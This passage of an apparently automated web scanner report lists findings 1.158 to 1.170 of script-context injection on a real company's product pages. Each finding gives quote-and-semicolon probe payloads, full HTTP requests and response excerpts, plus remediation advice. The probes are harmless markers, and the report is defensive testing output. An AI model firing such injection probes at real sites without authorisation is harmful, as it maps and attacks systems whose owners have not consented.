Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility33169'%3b4bebde12907/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:46 GMT
Content-Type: text/html
Content-Length: 42301
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility33169';4bebde12907/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.158. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e23de"%3bf980c1c8347 was submitted in the REST URL parameter 2. This input was echoed as e23de";f980c1c8347 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilitye23de"%3bf980c1c8347/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilitye23de";f980c1c8347/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.159. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 849d1'%3b22dae2fe542 was submitted in the REST URL parameter 1. This input was echoed as 849d1';22dae2fe542 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products849d1'%3b22dae2fe542/mobility/applications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products849d1';22dae2fe542/mobility/applications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.160. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aafe"%3b022906c52d was submitted in the REST URL parameter 1. This input was echoed as 3aafe";022906c52d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3aafe"%3b022906c52d/mobility/applications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products3aafe";022906c52d/mobility/applications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.161. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e146"%3b15362627beb was submitted in the REST URL parameter 2. This input was echoed as 5e146";15362627beb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility5e146"%3b15362627beb/applications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42327
Date: Wed, 17 Nov 2010 00:47:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility5e146";15362627beb/applications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.162. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63e89'%3b1a180dd0762 was submitted in the REST URL parameter 2. This input was echoed as 63e89';1a180dd0762 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility63e89'%3b1a180dd0762/applications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42325
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility63e89';1a180dd0762/applications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.163. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fadd0"%3bd9966f7ea03 was submitted in the REST URL parameter 3. This input was echoed as fadd0";d9966f7ea03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/applicationsfadd0"%3bd9966f7ea03/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/applicationsfadd0";d9966f7ea03/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.164. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/applications/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba37d'%3b0ea0de4bc45 was submitted in the REST URL parameter 3. This input was echoed as ba37d';0ea0de4bc45 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/applicationsba37d'%3b0ea0de4bc45/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/applicationsba37d';0ea0de4bc45/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.165. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da1a8'%3bbfbbcd1692 was submitted in the REST URL parameter 1. This input was echoed as da1a8';bfbbcd1692 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsda1a8'%3bbfbbcd1692/mobility/fixed-wireless/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Date: Wed, 17 Nov 2010 00:46:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Productsda1a8';bfbbcd1692/mobility/fixed-wireless/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.166. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a83d"%3b454b64589c7 was submitted in the REST URL parameter 1. This input was echoed as 9a83d";454b64589c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products9a83d"%3b454b64589c7/mobility/fixed-wireless/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products9a83d";454b64589c7/mobility/fixed-wireless/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.167. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc86'%3b380c747ec31 was submitted in the REST URL parameter 2. This input was echoed as bdc86';380c747ec31 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilitybdc86'%3b380c747ec31/fixed-wireless/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobilitybdc86';380c747ec31/fixed-wireless/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.168. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5ca8"%3bf3123d85d77 was submitted in the REST URL parameter 2. This input was echoed as f5ca8";f3123d85d77 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityf5ca8"%3bf3123d85d77/fixed-wireless/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42329
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilityf5ca8";f3123d85d77/fixed-wireless/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.169. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5eb0"%3b9c25d9dc05 was submitted in the REST URL parameter 3. This input was echoed as f5eb0";9c25d9dc05 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/fixed-wirelessf5eb0"%3b9c25d9dc05/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/fixed-wirelessf5eb0";9c25d9dc05/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.170. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/fixed-wireless/

Issue detail

